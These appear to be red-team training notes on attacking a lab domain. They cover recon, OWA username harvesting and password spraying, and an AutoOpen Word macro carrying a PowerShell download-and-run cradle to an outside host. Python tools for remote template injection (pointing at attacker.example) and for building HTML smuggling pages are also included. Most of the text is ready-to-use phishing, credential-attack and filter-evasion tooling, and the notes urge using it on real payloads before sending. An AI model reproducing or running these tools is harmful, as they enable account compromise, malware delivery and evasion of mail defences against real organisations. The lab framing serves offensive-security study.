• target: cyberbotic, cyberbotic.io
  • optional for the lab (the lab VM is not internet connected, so external recon can only be done from your own machine)

recon

dig cyberbotic.io                                        # DNS records (A, MX, NS, TXT)
whois <ip>                                               # owner / netblock of the resolved IP
dnscan.py -d cyberbotic.io -w subdomains-100.txt         # subdomain brute force from a wordlist
spoofy.py -d cyberbotic.io -o stdout                     # SPF / DMARC check: can the domain be spoofed?

  • google dorking
  • hunter.io

initial compromise

password spraying

common weak password patterns (spray one password per round across all users and stay under the domain lockout threshold):

  • MonthYear (e.g. August2022)
  • SeasonYear (e.g. Summer2022)
  • DayDate

use namemash.py to generate username candidates (first.last, flast, ...) from the names found during recon
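An added example (my own code, not namemash.py or anything from the course) of what those two generation steps do: namemash-style username permutations from a "First Last" name, and MonthYear / SeasonYear password candidates. The names are constructed sample input; the iyates form matches the account used later on the page.

```python
import itertools

MONTHS = ["January", "February", "March", "April", "May", "June", "July",
          "August", "September", "October", "November", "December"]
SEASONS = ["Spring", "Summer", "Autumn", "Winter"]


def username_candidates(full_name):
    """namemash-style permutations for one 'First Last' name (order kept, no duplicates)."""
    parts = full_name.strip().lower().split()
    if not parts:
        return []
    if len(parts) == 1:
        return parts
    first, last = parts[0], parts[-1]
    forms = [
        first + last,            # iainyates
        first + "." + last,      # iain.yates
        first[0] + last,         # iyates
        first[0] + "." + last,   # i.yates
        first + last[0],         # iainy
        last + first,            # yatesiain
        last + "." + first,      # yates.iain
        last + first[0],         # yatesi
        first,                   # iain
    ]
    seen, out = set(), []
    for form in forms:
        if form not in seen:
            seen.add(form)
            out.append(form)
    return out


def password_candidates(years, suffixes=("", "!")):
    """MonthYear and SeasonYear patterns for the given years, e.g. Summer2022.

    One entry per spray round; the caller is responsible for pacing against lockout."""
    words = MONTHS + SEASONS
    return [w + str(y) + s for w, y, s in itertools.product(words, years, suffixes)]


if __name__ == "__main__":
    # constructed sample input, e.g. names scraped via hunter.io
    for name in ["Iain Yates", "Jane Doe"]:
        print(name, "->", ", ".join(username_candidates(name)))
    print(password_candidates([2022])[:6])
```

Feed the username output to Invoke-UsernameHarvestOWA as possible.txt and pick one entry from the password list per round.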

mailsniper / sprayingtoolkit

PS> Import-Module c:\tools\mailsniper\mailsniper.ps1
# find the internal domain (NetBIOS) name, needed for the user harvest
PS> Invoke-DomainHarvestOWA -ExchHostname mail.cyberbotic.io
# check which candidate usernames exist (timing-based: valid and invalid users respond differently)
PS> Invoke-UsernameHarvestOWA -ExchHostname mail.cyberbotic.io -Domain cyberbotic.io -Userlist possible.txt -OutFile valid.txt

then use MailSniper to spray (one password across all valid users per round, pacing rounds against the domain lockout threshold)

PS> Invoke-PasswordSprayOWA -ExchHostname mail.cyberbotic.io -UserList valid.txt -Password Summer2022

get the global address list (one working credential pulls the GAL, which gives every mailbox in the org as a further spraying/phishing target)

PS> Get-GlobalAddressList -ExchHostname mail.cyberbotic.io -Username cyberbotic\iyates -Password Summer2022 -OutFile gal.txt

sending internal phishing mails

mark of the web

  • files that arrived from the internet (web download, attachment on external mail) carry the Zone.Identifier alternate data stream with ZoneId=3 (Internet zone); Office opens them in Protected View and macros are blocked
  • attachments on mails sent internally (e.g. from a compromised mailbox via OWA) don't get this mark, which is why phishing from inside works better
# read the ADS; no output means no mark of the web
PS> gc .\test.txt -Stream Zone.Identifier

word documents with macros

View > Macros > Create

Macros in: "Document 1", give it the name "AutoOpen" and click Create (AutoOpen runs automatically when the document is opened and macros are enabled)

Sub AutoOpen()

  ' WScript.Shell gives the macro a way to start a process
  Dim Shell As Object
  Set Shell = CreateObject("wscript.shell")
  ' test payload: start notepad to confirm the macro fires before swapping in the real command
  Shell.Run "notepad"

End Sub

cobalt strike:

  • Attacks > Scripted Web Delivery (S) → 64-bit PowerShell payload for the http listener (S = stageless)
  • after clicking "Launch" Cobalt Strike prints a PowerShell one-liner that downloads and runs the payload; replace the Shell.Run "notepad" line in the macro with it (quotes inside a VBA string have to be doubled):
Shell.Run "powershell.exe -nop -w hidden -c ""IEX ((new-object net.webclient).downloadstring('http://nickelviper.com/a'))"""

In Word, before saving:

File > Info > Inspect Document > Inspect Document: Inspect, then Remove All next to Document Properties and Personal Information (strips the author name and other metadata that would identify you)

File > Save As → c:\payloads, save as .doc (Word 97-2003); the legacy format can carry the macro, a plain .docx cannot (otherwise .docm is needed)

Cobalt Strike → Site Management → Host File (host the .doc on the team server's web server so the phishing mail can link to it)

Use a template from c:\Tools\PhishingTemplates

There's also remote template injection: the macro lives in a template hosted on the web server, and the document sent to the target is a clean .docx that fetches the template when opened (less for a mail filter to find in the attachment itself)

  • create the template (.dot/.dotm, Save As template) containing the macro and host it
  • create the .docx based on that template
    • open the .docx with 7zip → word → _rels → edit settings.xml.rels and set the Target of the attachedTemplate relationship to the URL of the hosted template (leave TargetMode="External" in place)
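An added example (my own code, not part of the course notes) that performs the 7zip step programmatically: unzip the .docx, rewrite the attachedTemplate Target in word/_rels/settings.xml.rels, and zip everything else back unchanged. The .docx it builds is a minimal constructed stand-in containing only the entries the technique touches, and http://attacker.example/template.dot is a hypothetical hosting URL.

```python
import io
import re
import zipfile

RELS_PATH = "word/_rels/settings.xml.rels"

# Constructed stand-in for the rels file of a .docx created from a local .dotm
# template (this is what Word writes; only the Target value is changed below).
SAMPLE_RELS = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n'
    '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
    '<Relationship Id="rId1" '
    'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" '
    'Target="file:///C:\\payloads\\template.dotm" TargetMode="External"/>'
    '</Relationships>'
)

# Match the attachedTemplate relationship up to its Target value, and the closing quote.
TARGET_RE = re.compile(r'(<Relationship\b[^>]*attachedTemplate[^>]*\bTarget=")[^"]*(")')
VALUE_RE = re.compile(r'attachedTemplate[^>]*\bTarget="([^"]*)"')


def build_sample_docx() -> bytes:
    """Minimal constructed .docx (a zip) with the entries the technique touches."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr(RELS_PATH, SAMPLE_RELS)
    return buf.getvalue()


def list_entries(docx: bytes) -> list:
    with zipfile.ZipFile(io.BytesIO(docx)) as z:
        return z.namelist()


def attached_template_target(docx: bytes) -> str:
    """Current attachedTemplate Target, or '' if the docx has no template relationship."""
    with zipfile.ZipFile(io.BytesIO(docx)) as z:
        if RELS_PATH not in z.namelist():
            return ""
        m = VALUE_RE.search(z.read(RELS_PATH).decode("utf-8"))
    return m.group(1) if m else ""


def inject_remote_template(docx: bytes, url: str) -> bytes:
    """Return a copy of docx whose attachedTemplate Target points at url.

    Same edit as doing it by hand in 7zip: only settings.xml.rels is changed,
    every other zip entry is copied through so the document still opens normally."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(docx)) as src, \
         zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for info in src.infolist():
            data = src.read(info.filename)
            if info.filename == RELS_PATH:
                text, n = TARGET_RE.subn(lambda m: m.group(1) + url + m.group(2),
                                        data.decode("utf-8"))
                if n != 1:
                    # a .docx not created from a template has no attachedTemplate
                    # relationship; adding one from scratch also needs settings.xml edits
                    raise ValueError("expected exactly one attachedTemplate relationship")
                data = text.encode("utf-8")
            dst.writestr(info, data)
    return out.getvalue()


if __name__ == "__main__":
    doc = build_sample_docx()
    # hypothetical URL where the macro-bearing template is hosted
    new = inject_remote_template(doc, "http://attacker.example/template.dot")
    print(attached_template_target(doc), "->", attached_template_target(new))
```

Run it against a real .docx by reading the file into bytes instead of calling build_sample_docx(); the Target check before and after is the sanity test that the right relationship was edited.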

HTML smuggling

hide files from content filters: the file is embedded in the page as base64 and only reassembled by JavaScript in the browser, so a mail or web gateway that inspects downloads sees an HTML page rather than the file itself

<html>
    <head>
        <title>HTML Smuggling</title>
    </head>
    <body>
        <p>This is all the user will see...</p>
 
        <script>
        // decode the base64 string into raw bytes (an ArrayBuffer)
        function convertFromBase64(base64) {
            var binary_string = window.atob(base64);
            var len = binary_string.length;
            var bytes = new Uint8Array( len );
            for (var i = 0; i < len; i++) { bytes[i] = binary_string.charCodeAt(i); }
            return bytes.buffer;
        }
 
        // the smuggled file, base64-encoded ("This is a smuggled file")
        var file ='VGhpcyBpcyBhIHNtdWdnbGVkIGZpbGU=';
        var data = convertFromBase64(file);
        var blob = new Blob([data], {type: 'application/octet-stream'});
        var fileName = 'test.txt';
 
        // legacy IE/Edge save API; otherwise trigger the download with a hidden <a download> link
        if(window.navigator.msSaveOrOpenBlob) window.navigator.msSaveOrOpenBlob(blob,fileName);
        else {
            var a = document.createElement('a');
            document.body.appendChild(a);
            a.style = 'display: none';
            var url = window.URL.createObjectURL(blob);
            a.href = url;
            a.download = fileName;
            a.click();
            window.URL.revokeObjectURL(url);
        }
        </script>
    </body>
</html>

to produce the base64 string for the file variable (-n drops the trailing newline so it isn't encoded too):

ubuntu@DESKTOP-3BSK7NO ~> echo -en "This is a smuggled file" | base64
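An added example (my own code, not from the course) that generates a smuggling page from any payload file using the same browser-side loader as above, and the reverse, pulling the embedded file back out of such a page, which is what an analyst or a gateway that inspects script content would do. The payload bytes are the constructed sample from the page.

```python
import base64
import html
import re

# Browser-side loader: same pattern as the page above (base64 -> bytes -> Blob ->
# hidden <a download> click). Doubled braces are str.format escapes.
PAGE_TEMPLATE = """<html>
<head><title>{title}</title></head>
<body>
<p>{visible}</p>
<script>
function convertFromBase64(b64) {{
    var bin = window.atob(b64);
    var bytes = new Uint8Array(bin.length);
    for (var i = 0; i < bin.length; i++) {{ bytes[i] = bin.charCodeAt(i); }}
    return bytes.buffer;
}}
var blob = new Blob([convertFromBase64('{b64}')], {{type: 'application/octet-stream'}});
var fileName = '{file_name}';
if (window.navigator.msSaveOrOpenBlob) {{
    window.navigator.msSaveOrOpenBlob(blob, fileName);
}} else {{
    var a = document.createElement('a');
    document.body.appendChild(a);
    a.style = 'display: none';
    a.href = window.URL.createObjectURL(blob);
    a.download = fileName;
    a.click();
    window.URL.revokeObjectURL(a.href);
}}
</script>
</body>
</html>
"""

SAFE_NAME = re.compile(r"[A-Za-z0-9._-]+")
B64_RE = re.compile(r"convertFromBase64\('([A-Za-z0-9+/=]+)'\)")


def encode_payload(data: bytes) -> str:
    """Same output as `echo -en <data> | base64`: no newline in the input, none in the output."""
    return base64.b64encode(data).decode("ascii")


def build_smuggling_page(payload: bytes, file_name: str,
                         visible: str = "This is all the user will see...",
                         title: str = "HTML Smuggling") -> str:
    # the file name lands inside a JS string literal, so restrict it rather than try to escape it
    if not SAFE_NAME.fullmatch(file_name):
        raise ValueError("file name must be [A-Za-z0-9._-] only")
    return PAGE_TEMPLATE.format(title=html.escape(title), visible=html.escape(visible),
                                b64=encode_payload(payload), file_name=file_name)


def extract_smuggled_file(page: str) -> bytes:
    """Recover the embedded file from a page built this way."""
    m = B64_RE.search(page)
    if not m:
        raise ValueError("no smuggled payload found")
    return base64.b64decode(m.group(1))


if __name__ == "__main__":
    # constructed sample payload, matching the page's example
    print(build_smuggling_page(b"This is a smuggled file", "test.txt"))
```

For a real payload read the file with open(path, "rb").read() and pass the bytes in; the extract function is the check that the page round-trips before sending it.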